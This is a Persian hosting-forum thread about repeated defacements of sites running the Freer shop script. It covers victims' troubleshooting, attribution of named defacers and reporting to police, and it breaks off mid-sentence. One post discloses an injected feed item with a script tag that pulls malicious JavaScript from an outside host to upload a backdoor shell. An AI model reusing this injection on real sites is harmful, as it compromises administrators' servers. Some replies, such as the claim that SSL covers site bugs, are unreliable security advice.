درود بر شما
حدوداً چند روزی میشه یکی از سایتهای ما صفحه اولش یا همون index توسط این جوجه هکر تغییر پیدا میکنه ، بارها سایت فوق رو ویروس یابی کردم و برای تست کل اطلاعات روی هاست رو حذف و یه index.html صرفاً برای لود شدن دامنه قرار دادم و دوباره همین فایل نیز تغییر پیدا کرد عملاً ارتباطی بین cms های قبلی یا امکان نفوذ از پلاگین های سایت با این اتفاق وجود نداره و نفوذ احتمالاً از طریق دسترسی به روت هاست هست تمام رمزهای ftp , دسترسی به هاست قبل از اتفاق دوم تغییر داده شده و بارها سایت اسکن شد ، امروز بکاپ قبلی رو روی سرور ویروس یابی کردم و هر فایل مشکوک که وجود داشت حذف کردم و سایت رو بحالت قبل برگردوندم که باز فایل index.html بروی روت سایت قرار گرفت و هنگام اجرای آدرس دامنه طبیعتاً index اجرا میشه !!! اگر این جوجه هکر دسترسی داشته باشه خب خیلی راحت فایلها و سایر فولدرها و حتی دیتابیس و ... هم باید دچار تغییرات بشه چرا فقط index.html آپلود میکنه !؟
چندتا سایت دیگر هم از طریق جستجوی گوگل یافتم و ظاهراً فقط سایت ما نبوده !
http://www.asarehteam.ir/
http://farsi.irancyber.org/blog/tag/%DA%A9%D8%A7%D8%B1%D8%A2%D9%81%D8%B1%DB%8C%D9%86/

لینکها زیادن نمیخوام داخل انجمن قرار بدم و شلوغ کاری بشه این تاپیک رو زدم اگه مورد مشابه و راه حلی بود اعلام کنید در نهایت این اتفاق تکرار بشه ناچارم سرور رو کلاً تغییر بدم و هاست جدید تهیه کنم >:)

------------------------------------------------------------
بزودی اطلاع رسانی در باره روش نفوذ این جوجه هکر ها انجام میشه روش نفوذ دقیقاً مربوط به اسکریپت فریر هست و این علمای تازه کار افتادن به جونه هر چی سایته که این اسکریپت روی هاستشون قرار گرفته ... ! >:)

آقای رامین خان دمتم گرم شبانه روز تو انجمن هستی و تمام تلاشتو میکنی این انجمن بهترین باشه اما وقتی تیتر میزنم جوجه هکر لطفا ویرایش نکن که همه بدونن اینا و کل تیمشون جوجه هکرن و یه باگ که سرتاسر اسکریپت Bayram باگه اینا پیدا کردن ( به زودی تاپیک مربوطه با اطلاع رسانی کامل ایجاد میشه ) و تمام سایتهایی که میزنن قربانی استفاده از اسکریپت freer هستن دیگه کسی نیاد بگه اینا با سابقه و حرفه ایی هستن !

آدرس سایت تون ؟

آدرس سایت تون ؟


چون بکاپ برداشتم آدرس رو قرار میدم :-&
(http://forums.irserv.net/)

http://forums.irserv.net/

الان دقیقا میخوای چیکارش کنی؟

الان دقیقا میخوای چیکارش کنی؟
درود بر شما ، هدف پیشگیری یا شناسایی روش آپلود در روت هاسته این تاپیک رو زدم شاید یکی از شما عزیزان ، مخصوصاً ارائه کنندگان هاست با این مشکل مواجه شده باشید و اطلاع رسانی کنید چون این موضوع به یک سایت ختم نمیشه و تا اونجا که توانایی داشتم نکات امنیتی رو رعایت کردم ...

سلام
پیشنهاد میکنم از ایشون کمک بگیرید
http://www.webhostingtalk.ir/member.php?u=165

احتمالا از نسخه نال شده vBulletin استفاده میکنید برای همین یه سری مشکلات فنی ایجاد میکنه . 100 درصد قالب سایتتون هم هفره امنیتی داره. حتمی انجمن رو با اخرین نسخه بروز کنید. و یه گزینه دیگه از گواهی ssl استفاده کنید این مشکل هم بلکل از بین میره. طبق تجربه بنده.

احتمالا از نسخه نال شده vBulletin استفاده میکنید برای همین یه سری مشکلات فنی ایجاد میکنه . 100 درصد قالب سایتتون هم هفره امنیتی داره. حتمی انجمن رو با اخرین نسخه بروز کنید. و یه گزینه دیگه از گواهی ssl استفاده کنید این مشکل هم بلکل از بین میره. طبق تجربه بنده.

درود
بسیار به نکته مهمی اشاره فرمودین و اصلاً فراموش کرده بودم برای تست ربات تلگرام از ssl رایگان 1 ساله سایت خارجی استفاده کردم ، به نظر شما دلیل دسترسی به روت و امکان آپلود فایل index از همین ssl میتونه باشه چون تنها تغییر اخیر همین ssl بوده و دقیقا از زمانی این ssl بروی سایت قرار گرفت این مشکلات بوجود آمده !!! فعلاً که unistall شد بازم ممنون از نکته سنجی و دقت شما دوست عزیز :53:

برای تست کل اطلاعات روی هاست رو حذف و یه index.html صرفاً برای لود شدن دامنه قرار دادم و دوباره همین فایل نیز تغییر پیدا کرد

اگر همه چی را پاک میکنید فقط یک ایندکس میگذارید پس مشکل باگ مدیریت محتوا و .. ندارید و ارتباطی هم با گواهی که نصب کردید ندارد، اگر بروی سرور، سایت های دیگری میزبانی میشوند چک کنید احتمال symlink زیاد هست که مشکل از امنیت سرویس دهنده شما میباشد.

این هکر را میشناسم و همچنین محمد نفوذی که زیرش نوشته اینا جوجه نیستند عزیز خیلی وقت هست تو این کار هستند سایت های شاخی هم زدند . اما در کل ندیده نمیشه اینجا کسی کمکی بده باید یک متخصص امنیت برسی کنه اسکریپت و سرور را ببینه مشکل کجاست هم از طریق لاگ هم اسکنر ها هم باگ هایی خودش بلده بره سراغشون ببینه تو ماله شما پچ هست یا نه یعنی کسی که این کاره باشه دسترسی ها پوشه ها قفل گذاری ها پیکربندی اینا همه باس انجام بشه باگ هایی که تالا کشف شده یا جدید همه را باس چک کنه مشکلی نباشه سپس بره سراغ سرور هاست . اینا هم که سایت شما را زدند میخوان هزینه بدید درست کنند واستون اما خوب نمیشه اعتماد کرد من توصیه میکنم به https://fullsecurity.org
یا
secure-host.ir

سلام
نوع حمله در zone-h به صورت Mass deface گزارش شده :
http://www.zone-h.org/archive/ip=78.46.72.183
ترجیحا میزبان خودتون رو عوض کنید
cms رو از یک منبع معتبر دریافت و مجددا نصب کنید.

با سلام


این دوست عزیز هکر تازه ای نیست ایشون با نام قبلی یعنی Sheytan azzam در اینترنت فعالیت داشتند

و الان با این اسم فعالیت دارند
برای اطلاعات بیشتر گفتم

در مورد امنیت دهی اصلا fullsecurity رو توصیه نمی کنم !

چون توسط دوستان همین آقای حمید چندی پیش هک شده بود

و به هرجایی برای امنیت دهی هزینه پرداخت کنید همیشه آن ها یک بک دور نگهداری می کنند تا به سایت شما دسترسی داشته باشند

خودتان امنیت دهید بهتر از همه چیز هست !

موفق باشید

با سلام


این دوست عزیز هکر تازه ای نیست ایشون با نام قبلی یعنی Sheytan azzam در اینترنت فعالیت داشتند

و الان با این اسم فعالیت دارند
برای اطلاعات بیشتر گفتم

در مورد امنیت دهی اصلا fullsecurity رو توصیه نمی کنم !

چون توسط دوستان همین آقای حمید چندی پیش هک شده بود

و به هرجایی برای امنیت دهی هزینه پرداخت کنید همیشه آن ها یک بک دور نگهداری می کنند تا به سایت شما دسترسی داشته باشند

خودتان امنیت دهید بهتر از همه چیز هست !

موفق باشید
زنده باد هدف خودم همینه اما بحث از دسترسی و پسورد گذاری روی فولدرها و رمزهای پیچیده در تمام قسمت ها از دیتابیس تا مدیریت محتوا گذشته ، دیشب در انجمن دیگری که بحث را دنبال میکردم عزیزانی بعد از اسکن و روش های خودشون تاکید داشتن عامل نفوذ ضعف امنیتی سروره !

با سلام

مسئولیت سرور دست شما نیست شما امنیت سایت و اسکریپت خود را افزایش دهید اگر بازم هک شد به مسئول سرور گزارش دهید

در ضمن اگر خواستید با ایشون صحبت کنید می توانید با این آی دی در اسکایپت در ارتباط باشید

mardonehgi

این آی دی دوست عزیزمون sir hamid هست

با سلام

مسئولیت سرور دست شما نیست شما امنیت سایت و اسکریپت خود را افزایش دهید اگر بازم هک شد به مسئول سرور گزارش دهید

در ضمن اگر خواستید با ایشون صحبت کنید می توانید با این آی دی در اسکایپت در ارتباط باشید

mardonehgi

این آی دی دوست عزیزمون sir hamid هست
درود بر شما و تشکر بخاطر حضور در این تاپیک ، این افراد اساسا نمیشه گفت هکر هستند چون نفوذ به هاست معمولی و ارزان قیمت سایتها که نهایتا خدمات آموزشی یا حتی تجارت کسب و کار شخصی دارند هک محسوب نمیشه در کارنامه این جوجه هکرها یک وب سایت معروف و معتبر دولتی یا غیر دولتی در سطح بالا وجود نداره و نخواهد داشت و هدفشون و نهایت تجربشون در حد چند سایت معمولیه این سایت هم تا این حد برام مهم نیست که نیاز به ارتباط و درخواست از این افراد باشه صرفا هدفم کسب تجربه و تبادل اطلاعات با شما اساتید و فعالین در فضای مجازی هست برای فعالیتهای جدی تر

سعي كنيد خودتون سايتتونو امن كنيد!سايت هايي كه امن ميكنند اخرش خودشون هكرن و ممكنه لتمه بزنن

Mass deface ثبت شده پس صددرصد Symlink زده که رو سرور شل مخفی زیاد داره. میزبانتو عوض کن. اون ssl هم که اون عزیز salar گفت چینج کن منظورش حمله man in the middle بود

هاستتون که ارزان هست همین میشه از جای معتبر تری خرید کنید هاست اینطور که دوستان میگن انگار مشکل از هاست میزبانی هست .

درود
بسیار به نکته مهمی اشاره فرمودین و اصلاً فراموش کرده بودم برای تست ربات تلگرام از ssl رایگان 1 ساله سایت خارجی استفاده کردم ، به نظر شما دلیل دسترسی به روت و امکان آپلود فایل index از همین ssl میتونه باشه چون تنها تغییر اخیر همین ssl بوده و دقیقا از زمانی این ssl بروی سایت قرار گرفت این مشکلات بوجود آمده !!! فعلاً که unistall شد بازم ممنون از نکته سنجی و دقت شما دوست عزیز :53:

منظور بنده این بود ssl رو فعال کنید کلا صفحه ها با ssl بالا بیاد. همه صفحه ها با https بالا بیاد. ssl باعث رمز نگاری ازسال اطلاعات صفحات میشه و باگ های سایت شما رو پوشش میده. از یه نسخه که مورد تایید مرورگرها هست استفاده کنید. اگه منظورتون رایگان startcom ssl و china ssl هست هر دو ssl های خوبی هستن.

در حالتی که شما فرمودین 1فایل index.html قرار دادید و همین فایل هم دستکاری شده 100% مشکل شما مشخص شده.
سرور هاستینگ سایتتون رو مس دیفیس زدن
اگه سایت مهم هست یک VPS بگیرید و کانفیگ و تامین امنیت اولیه رو به یک فرد کاردان بسپرید، سپس در طول ماه خودتون هم مونیتور و تا حد امکان منیج کنید
در این حالت چون روی share هاست نیست دیگه،
مشکل باگ داشتن سایتهای دیگه روی سرور هم دامن شما رو نخواهد گرفت

معمولا سپردن امنیت به برخی افراد در ایران درست نیست چون بر اثر مراودات و خیلی مسائل دیگه ممکنه همون فرد به شما ضرری برسونه
سایتهای خارجی بدون شناخت از شما، رقیبان و سایتتون این کار رو به نحو احسن انجام میدن

در حالتی که شما فرمودین 1فایل index.html قرار دادید و همین فایل هم دستکاری شده 100% مشکل شما مشخص شده.
سرور هاستینگ سایتتون رو مس دیفیس زدن
اگه سایت مهم هست یک VPS بگیرید و کانفیگ و تامین امنیت اولیه رو به یک فرد کاردان بسپرید، سپس در طول ماه خودتون هم مونیتور و تا حد امکان منیج کنید
در این حالت چون روی share هاست نیست دیگه،
مشکل باگ داشتن سایتهای دیگه روی سرور هم دامن شما رو نخواهد گرفت

معمولا سپردن امنیت به برخی افراد در ایران درست نیست چون بر اثر مراودات و خیلی مسائل دیگه ممکنه همون فرد به شما ضرری برسونه
سایتهای خارجی بدون شناخت از شما، رقیبان و سایتتون این کار رو به نحو احسن انجام میدن
سلام
خوشحال میشم لیست وب سایتهای ذکر شده را به اشتراک بگذارید البته اگه خودتون همکاری داشتین و مورد تایید هستن

ایشون حتی بک لینک سافت گذر و خیلی از سایت های بزرگ رو میفروشند !

فک نگنم جوجه باشن !

به پیشنهاد یکی از دوستان در سایت دیگر میگه چون سایتت سالهاس در ساماندهی به نام خودت ثبت شده و فعالیت تجاری هم داشتی مدارک جمع و جور کن شکایت کن و درخواست غرامت کن

>:):)"

اصلاً من مدارک و مستندات حتی log ها و ... رو ببرم آخر سالی مثلاً پلیس فتای استان خودمون پیگیری میکنن ؟؟! اصلاً شکایتی می پذیرن که واقعاً پیگیر باشن چون یادمه یه مدت رمز فروشگاههای کارت شارژ رو میزدن فتا بشدن پیگیری میکرد و حتی طرف رو دستگیر میکرد ... خلاصه شنبه برم تشکیل پرونده بدم در نهایت پولی ازش درمیاد یا نه .

:61:

سلام

انگار این نوب هکر دوباره دیفیس کرد اینبار نیز با دسترسی به index.php ترجیح میدم اگر مشکل امنیتی دارید به خودش بسپارید بهتره چون پسر بسیار خوبی هست

به پیشنهاد یکی از دوستان در سایت دیگر میگه چون سایتت سالهاس در ساماندهی به نام خودت ثبت شده و فعالیت تجاری هم داشتی مدارک جمع و جور کن شکایت کن و درخواست غرامت کن

>:):)"

اصلاً من مدارک و مستندات حتی log ها و ... رو ببرم آخر سالی مثلاً پلیس فتای استان خودمون پیگیری میکنن ؟؟! اصلاً شکایتی می پذیرن که واقعاً پیگیر باشن چون یادمه یه مدت رمز فروشگاههای کارت شارژ رو میزدن فتا بشدن پیگیری میکرد و حتی طرف رو دستگیر میکرد ... خلاصه شنبه برم تشکیل پرونده بدم در نهایت پولی ازش درمیاد یا نه .

:61:








بله در میاد

سلام

انگار این نوب هکر دوباره دیفیس کرد اینبار نیز با دسترسی به index.php ترجیح میدم اگر مشکل امنیتی دارید به خودش بسپارید بهتره چون پسر بسیار خوبی هست

درود ، در ضعف هاست شک ندارم چون بسادگی فایل index را آپلود میکنه و مطمئنم سطح دسترسی در همین حد است ... اتفاقاً الان به این نتیجه رسیدم هکر با مزه و با صفایی هم هست با اینکه مطمئنم این متن هم می بینه فقط در همین حد بدون اگر ی اسکریپت مثه freer پر از باگ و مشکل هست و امثال تو با نفوذ از طریق فایلهای اون اسم خودتون رو گذاشتین هکر کور خوندی چون ردتو زدم و مچتو گرفتم :113:

- - - Updated - - -

بزودی اطلاع رسانی در باره روش نفوذ این جوجه هکر ها انجام میشه روش نفوذ دقیقاً مربوط به اسکریپت فریر هست و این علمای تازه کار افتادن به جونه هر چی سایته که این اسکریپت روی هاستشون قرار گرفته ... ! >:)

آقای رامین خان دمتم گرم شبانه روز تو انجمن هستی و تمام تلاشتو میکنی این انجمن بهترین باشه اما وقتی تیتر میزنم جوجه هکر لطفا ویرایش نکن که همه بدونن اینا و کل تیمشون جوجه هکرن و یه باگ که سرتاسر اسکریپت Bayram باگه اینا پیدا کردن ( به زودی تاپیک مربوطه با اطلاع رسانی کامل ایجاد میشه ) و تمام سایتهایی که میزنن قربانی استفاده از اسکریپت freer هستن دیگه کسی نیاد بگه اینا با سابقه و حرفه ایی هستن !

بعضیا همچین میگند جوجه نیست انگار رفته گوگل و فیسبوکو هک کرده!
دیگه ویبولتین که امنیتش مشخصه وردپرس و جوملا و.... هم مثل ویبولتین
هاست هم که ظاهرا معتبر نیست
اینو بچه ۴ ساله خواهر منم میتونه هک کنه!!
هکر حرفه ای نمیاد روزی صدبار ایندکس یه سایتو عوض کنه اونم سایتی که زیاد مهم نیست
یه راهی پیدا کرده داره هک میکنه ذوق میکنه شما سرورو عوض کن حله

دیگه اصطلاح هکر فکر نمیکنم مناسب باشه برای این اشخاص !

از تو کوچه که رد میشی میبینی دست چهار تا بچه گوشیه و در مورد هک وایفای حرف میزنند و به هم میگن هکت کردم !

به تیم های امنیتی بگید باگ هاتون رو پیدا میکنند یا از برنامه اکانتیکس استفاده کنید

بعضیا همچین میگند جوجه نیست انگار رفته گوگل و فیسبوکو هک کرده!
دیگه ویبولتین که امنیتش مشخصه وردپرس و جوملا و.... هم مثل ویبولتین
هاست هم که ظاهرا معتبر نیست
اینو بچه ۴ ساله خواهر منم میتونه هک کنه!!
هکر حرفه ای نمیاد روزی صدبار ایندکس یه سایتو عوض کنه اونم سایتی که زیاد مهم نیست
یه راهی پیدا کرده داره هک میکنه ذوق میکنه شما سرورو عوض کن حله

درود و سپاس از حضور شما در این تاپیک ، بعد از ساعتها مانیتور کردن و بررسی هاست متوجه شدم این جوجه هکرها که به ظاهر تیم هم تشکیل دادن از طریق smarty موجود در اسکریپت نا امن فریر این نفوذ را انجام و فایل index را در هر قسمت از هاست آپلود میکنند تمام سایتها هم که قربانی روش اینا شدن با قاطعیت میگم از این اسکریپت روی هاستشون استفاده کردند موضوع بسیار سادس باگ موجود در فایل دسترسی مشابه آپلود میده بزودی تاپیک کامل و جامع ایجاد میکنم و پیشنهاد میکنم از این اسکریپت برای ایجاد فروشگاه استفاده نشه !!! این جوجه هکر در زمانی که این تاپیک رو بروز میکردم index رو تغییر داد و فکر نمیکرد دستش رو شه به جرأت میگم تیم اینا مشخصاً باید اوقات فراغت خودشون رو در مهدکودک و پیش دبستانی ها و بازی با همسن و سالای خودشون صرف کنند به زودی نسبت به اطلاع رسانی به سایتهای قربانی و همچنین در انجمن های معتبر اقدام میکنم تا راه اخاذی و کسب درآمد از مدیر سایتها مسدود بشه ... خلاصه این جوجه هکر ها فقط یک روش دارن و دقیقاً مربوط به اسکریپت فریر هست و شاید در حد ابتدایی هم کار با سرور و هاست رو بلد نباشن ...

سلام ایشون جوجه یا نوب نیست !!اگه اشتباه نکنم یکی از مدیران تیم ایران سایبره که بسته شده!! (به خیلی از سایت های هک و امنیت نفوذ کرده)به احتمال خیلی زیاد شل آپلود کرده !! http://www.zone-h.org/archive/notifier=sheytan%20azzam

سلام ایشون جوجه یا نوب نیست !!اگه اشتباه نکنم یکی از مدیران تیم ایران سایبره که بسته شده!! (به خیلی از سایت های هک و امنیت نفوذ کرده)به احتمال خیلی زیاد شل آپلود کرده !! http://www.zone-h.org/archive/notifier=sheytan%20azzam
تیم نه مهدکودک بود که تعطیل شد تمام این سایتها قربانی استفاده از اسکریپت فریر هستند و این جوجه هکرها با استفاده از روشی که در بالا توضیح دادم اقدام به آپلود فایل index بروی محل مورد نظر کردن در نظر دارم با ایجاد تاپیک در انجمن های معتبر و مکاتبه با مدیران این سایتها که تماماً ایرانی هستند و قربانی استفاده از اسکریپت فوق هستند شرایطی جهت آگاهی و مهمتر تنبیه این کودکان انجام بدم چون کسب و کار سایتها رو مختل کردن و مطمئنن مشمول پرداخت خسارت خواهند بود شناسایی عوامل و پیگیری پرونده با مسئولین مربوطه که امیدوارم شنبه از بنده استقبال کنند و اجازه طرح شکایت و ارائه مدارک و اسناد به بنده داده بشه ، و در کنار این موارد اطلاع رسانی انجام بگیره تا جلوی این اخاذی ها گرفته بشه ...

با ادمین اینجا صحبت کنید
http://farswebhost.com/
اقای شهریاری

مدیر اشیانه در بخش سرور ها کارشون عالیه حل میکنن مشکلتون را

و روی کل سرور شل دارن و دارن اپلود میکنن هر کاری هم کنید سایت شما نمی خوره داره از جای دیگه اپلود میشه هاست مناسب انتخاب کید

سلام ایشون جوجه یا نوب نیست !!اگه اشتباه نکنم یکی از مدیران تیم ایران سایبره که بسته شده!! (به خیلی از سایت های هک و امنیت نفوذ کرده)به احتمال خیلی زیاد شل آپلود کرده !! http://www.zone-h.org/archive/notifier=sheytan%20azzam

تیم امنیتی ما نداریم تو ایران!!!!
اینا که هستن مثل آشیانه و... بقول دوستمون مهد کودکن
حرفه ای ها تو ایران نمیمونن
اونایی هم که موندن،یا گذاشتن کنار یا تو شرکتا مشغولن

درود
دوستان آدرس اصلی سایت این هاستینگ رو میخوام ( هاست فریر هست ) freer.ir
nserver: ns1.caspianhosting.net
nserver: ns2.caspianhosting.net
آدرس caspianhosting.net رو زدم باز نمیشه !

- - - Updated - - -

مطمئنن اگر تاپیکی با موضوع حقه بازی این جوجه هکرها ایجاد کنم سریعاً مدیران اقدام به حذف میکنن البته هم حق دارند چون ارتباطی با این مجموعه ندارد پس تصمیم گرفتم اخبار اطلاع رسانی و پیگیری همه جانبه را در انجمن خودم قرار بدم در صورتی تمایل دارید و سایت شما نیز مورد نفوذ این جوجه هکرهای حقه باز قرار گرفته این آدرس (http://forums.irserv.net/showthread.php?tid=1409&pid=2226#pid2226) را دنبال کنید
http://forums.irserv.net/showthread.php?tid=1409&pid=2226#pid2226

لازم به توضیح است با اکثر سایتهای موجود در لیست این حقه بازان بروی http://zone-h.net/ در حال مکاتبه هستم تا در صورتی تمایل داشته باشند اقدام هماهنگ جهت طرح شکایت انجام بدیم وقتی لیست این همه سایت ایرانی را دیدم و همه این سایتها قربانی استفاده از اسکریپت فریر شدن تصمیم قطعی گرفتم تا مجموعه ایی عظیم برای مقابله با این حقه بازان تشکیل بدم تا جلوی اخاذی گرفته بشه ...

بنده سعی می کنم فردا مواردی که فرمودید و بررسی کنم و نکات و دنبال کنم
اگر مورد خاصی هم بود می تونید پیغام خصوصی ارسال بفرمایید
تشکر

بنده سعی می کنم فردا مواردی که فرمودید و بررسی کنم و نکات و دنبال کنم
اگر مورد خاصی هم بود می تونید پیغام خصوصی ارسال بفرمایید
تشکر

درود و تشکر از حضور شما در این تاپیک ، باور بفرمایید اینها فقط با حقه و کلک بفکر کسب منفعت و اخاذی هستند از دیروز چندین بار بقول خودشون سایت بنده همون irserv.net رو هک و ثبت کردن از زمانی ترفند آپلود فایل index این حقه بازان رو فهمیدم فقط به فکر اطلاع رسانی هستم لیست سایتهای فروشگاه روی این صفحه رو ببینید http://zone-h.net/archive/notifier=sheytan%20azzam مساله فقط یک سایت من نیست از همین لحظه هزاران سایت ایرانی در خطر هستند
آقایونه وبمستر ، هاستینگها ، اساتید محترم اسکریپت فریر رو ممنوع اعلام کنید و تا اطلاع رسمی یک برنامه نویس مورد تایید بهیچ عنوان اجازه نصب این اسکریپت روی هاست رو ندید و نصب نکنید !!!

الان شما مشکل امنیتی دارید؟

سلام دوست عزیز .

الکی به خودتون جو ندید سایت هایی که در لیست zone h ثبت شده برای یک روز نیستند و حاصل کار 2 سال هستند .

البته این اسکریپت که فرمودید باگ دارد با انجام چند کار ایمن سازی باگ های آن برطرف میشود ، البته ایشون مدتی هستند که خدمات امنیتی انجام میدهند و هیچ اجباری بر اینکه برای ایمن سازی به ایشون میل کنید نیست و تنها در صورتی که مایل بودید میتوانید کار را به ایشون بسپارید.

امیدوارم که مشکلتون رو تونسته باشید حل کنید.

موفق و موید باشید

با سلام

منم فریرم چند وقتی هست که همش داره هک میشه هنوز که خوشبختانه نتونستن کاری بکنن

مثلا محصول ناشناخته اضاف میشه و همچنین مبلغ های که ناشناس هستش تو درگاه به صورت ناموفق ایجاد میشه

تاپیک هم زدم هنوز هیچکی راهنمایی نکرده

فقط یه چیزی و خلاصه عرض کنم چون خودم فوق لیسناس امنیت شبکه و اطلاعات می خونم
تا حالا ندیدم یک هکر درست و حسابی و اسم و رسم دار ( از نظر شخصتی عرض میکنم)
دیدم که سایت کشور خودش و بزنه
مثلا یک چینی با سایت های چینی کاری نداره
روسی - ترک - روس و...
البته امریکا و دیدم ولی خوب بعد از اون همکاری صورت میگیره
اما در مورد ایشون
دوستی که فرمودند این هکر یا گروه.... 2سال هست که فعالیت میکنند
سوابق مربوط به ایشون در http://zone-h.net/ شرم آورترین سابقه یک هکر بود که تا حالا من دیدم
موفق باشید

الان شما مشکل امنیتی دارید؟

الان دیگه بحث امنیت در کار نیست از 2 روز پیش بارها صفحه index سایت من تغییر پیدا میکرد و به نام چند جوجه هکر با عنوان برای امنیت با ما تماس بگیرید مواجه میشدم بیش از 3 بار این اتفاق تکرار شد از اسکن هاست تا بررسی مدیر سرور و موارد دیگر که دوستان لطف کردن و دسترسی گرفتن در نهایت متوجه شدیم که با فراخوانی فایل smarty_internal_templateparser.php واقع در include\libs\smarty\sysplugins توسط نفوذگر فایل جدید آپلود و بعبارتی جایگزین میگردد از این لحظه وظیفه فقط اطلاع رسانی است چون هر هاستی که این اسکریپت روش قرار داره با همین مشکل مواجه میشه
طرف در حال افزایش آمار و اعلام خودش بعنوان یک هکر مطرحه اما فقط یک حقه بازه که شاید ساده ترین روش ها رو هم بلد نباشه !!!
همین حالا به آدرس http://www.zone-h.org/contact/type/1 برید و درخواست حذف page این حقه بازان را به مدیران http://www.zone-h.org ارسال کنید
در متن مکاتبه نامهای این حقه بازان را حتماً عنوان کنید sheytan azzam و general.eshgh

نمونه متن مکاتبه در اینجا (http://forums.irserv.net/showthread.php?tid=1409&pid=2227#pid2227)

یکی 2 بار مشتری هایی داشتیم که گفتند سایتمون هک شده برامون فرمت کنیدو .. که بازم فرییر بود ما چیزی چک نکردیم
در هر حال به پشتیبانی فرییر هم ایمیل دادیم برای پیگیری و لینک تایپیک هم ارسال کردیم
دوستان چند درخواست براشون ارسال کنید پیگیر قضیه باشند برای امنیت بیشتر اسکریپت

با ادمین اینجا صحبت کنید
http://farswebhost.com/
اقای شهریاری

مدیر اشیانه در بخش سرور ها کارشون عالیه حل میکنن مشکلتون را

و روی کل سرور شل دارن و دارن اپلود میکنن هر کاری هم کنید سایت شما نمی خوره داره از جای دیگه اپلود میشه هاست مناسب انتخاب کید
این سایتی که دادید مدیرش sourena blackhat نیست !!!

بعضیا همچین میگند جوجه نیست انگار رفته گوگل و فیسبوکو هک کرده!
دیگه ویبولتین که امنیتش مشخصه وردپرس و جوملا و.... هم مثل ویبولتین
هاست هم که ظاهرا معتبر نیست
اینو بچه ۴ ساله خواهر منم میتونه هک کنه!!
هکر حرفه ای نمیاد روزی صدبار ایندکس یه سایتو عوض کنه اونم سایتی که زیاد مهم نیست
یه راهی پیدا کرده داره هک میکنه ذوق میکنه شما سرورو عوض کن حله
هاست ایشون مشکل داشته درست !

زون اچ ایشون ببینید !

یه سایت هایی داخلشه سرور دارن و خیلی معنبرن !

بهرحال چون فیس بوک و گوگل رو هک نکردن هکر نیستن!

سلام

متاسفانه به علت تمایل هاستینگ ها به ارزان تر تمام شدن هزینه سرور ها و عدم تخصص در کانفیگ امنیت سایت ها پایین میاد و باگ هایی که در اسگریپت ها پیدا میشه باعث هک سریع سایت ها میشه.

اما مشتری هم در این موضوع دخیل هست معمولا مشتریان امنیت سایت های خودشون رو به دست گروه های هکر میسپارند در صورتی که اکثریت هکر ها چیزی از تامین امنیت نمی دونند و تنها راه هایی برای دور زدن امنیت رو یاد گرفتند !

یک وبمستر اگر هاست مناسبی در اختیار داشته باشه دسترسی کامل برای تامین امنیت سایتش با php.ini و htaccess رو داره و با ایجاد محدودیت در دسترسی ها و ... می تونه سایتش رو حتی با وجود باگ های جدید و ... حفظ کنه !


برای سایت استاتر پیشنهاد می کنم هاستتون رو به سرور امن تری انتقال بدید که از کلاود لینوکس یا پتچ کرنل و .. استفاده کرده باشه تا حملات سیم لینک در امان باشید بعد کلیه فایل های هاستتون رو جایگزین کنید و رمز های عبور ftp و .... رو تغییر بدید و با htaccess دسترسی به فایل هایی که برای پنل های مدیریت و.. هستند رو محدود به آیپی خودتون کنید و...

اسکریپت virtual Freer مشکلات امنیتی جدی داره. در خیلی از آرشیو های نصب موجود از این اسکریپت کدهای بکدور و آپلود شل جاسازی شده و مشکل اصلی هم خود سایت freer.ir هست که مدتها قبل هک شده و آرشیو های اسکریپت دستکاری شدند.

آخرین و بدترین مشکل هم مربوط به کد جاوا اسکرپیت اینجکت شده در انتهای


http://freer.ir/xml.php

هست.



<item>
<title><=!=[=C=D=A=T=A=[<script src="http://www.ckvalaska.cz/wp-content/scripts/cdn.fer.js?ver=9.2"></script>]=]=></title>
<link></link>
<description>-</description>
<category>-</category>
<guid></guid>
<pubDate>Wed, 14 May 2012 13:38:44 Asia/Tehran</pubDate>
</item>

این آدرس ظاهرا مربوط به خبرخوان هست و تمامی اسکریپتهای نصب شه روی سایت های مختلف در هنگام دسترسی به داشبورد این اسکریپت به آدرس

http://freer.ir/xml.php

متصل و خروجی این آدرس رو دریافت و به مرورگر مدیر اسکریپت اینجکت میکنن. کد فایل

http://www.ckvalaska.cz/wp-content/scripts/cdn.fer.js?ver=9.2

به محض دریافت در مرورگر قربانی اجرا و با دسترسی مدیر یک فایل شل رو از طریق خود اسکریپت روی سایت آپلود میکنه و به همین راحتی با یک حمله xss سایت قربانی آلوده به یک فایل شل بکدور میشه(یکبار لاگین در داشبورد اسکریپت برابر هست با آپلود شل بکدور روی سایت قربانی)

درود بر دوستان ، ابتدا باید عرض کنم که امروز صبح با مراجعه به آدرس شهریار-عباس آباد - خیابان وحدت اسلامی - روبروی گلزار شهدا - ساختمان پلیس فتا طبقه دوم اتاق 8/ 2 تا فرم گرفتم که در سربرگ شامل مشخصات خودتون و پایینش هم فرم اولی فضای خالی برای متن موضوع که باید داخلش مطالب مربوط به نفوذ سایت از طریق اسکریپت فروشگاه ساز فریر به آدرس freer.ir و بعدش آدرس سایت خودتون که مورد نفوذ و سرقت قرار گرفته حتماً داخل متن اشاره کنید که به نگارنده اسکریپت و مدیر سایت free.ir مشکوک هستید در ادامه لینکهایی که در این تاپیک هست چون من پرینت داشتم حتی لینک روی سایت http://www.zone-h.org/ مربوط به 2 یوزر هم ضمیمه کردم و پرینت سایتهای قربانی استفاده کننده از اسکریپت هم با فرمها ضمیمه کردم موضوع مهمتر لاگ کنترل پنل هست باید ازش پرینت تهیه کنید مثلاً Cpanel رو من علاوه بر گزینه log خودش با کمک مدیر سرور آدرس ip های نفوذکنندگان رو بصورت دستی داخل فرم نوشتم و در پایان توضیحاتم راه نفوذی که در این اسکریپت بود رو گزارش دادم حتی خود اسکریپت همراهم بود داخل فلش مموری اما فعلاً گفتن لازم به این موضوع نیست در فرم دوم ابتدا نام و مشخصات و کد ملی و آدرس و شماره تماس و قسمت دوم مشخصات سایت یا سرور رو باید کامل و دقیق وارد کنید آدرس دامنه هم دقیق و درست وارد کنید و زیرش هم محل نصب اسکریپت بصورت دقیق مثلا اگر اسکریپت روی ساب دامنه shop.domain.com بود حتماً زیر قسمت آدرس دامنه بنویسی آدرس محل نصب فروشگاه و آدرس رو دقیق بنوسید در نهایت گفتن تماس میگیریم و سماجت هم بخرج دادم و با رئیس اداره که سرگرد محترمی هم بودن چند لحظه اجازه صحبت گرفتم که اینا بسیار سازمان یافته و با برنامه ایی که سالها ریخته بودن ابتدا این اسکریپت رو در فضای مجازی و بین سایتهای ایرانی منتشر کردن و زمانی که هزاران سایت رو آلوده کردن اقدام به اخاذی و کسب درآمدهای کلان از این شیوه کردن ، اصلاً نیاز نیست نگران باشید حتی اگه اکانت و مواردی دارید طبق اطلاعیه ها کاملاً 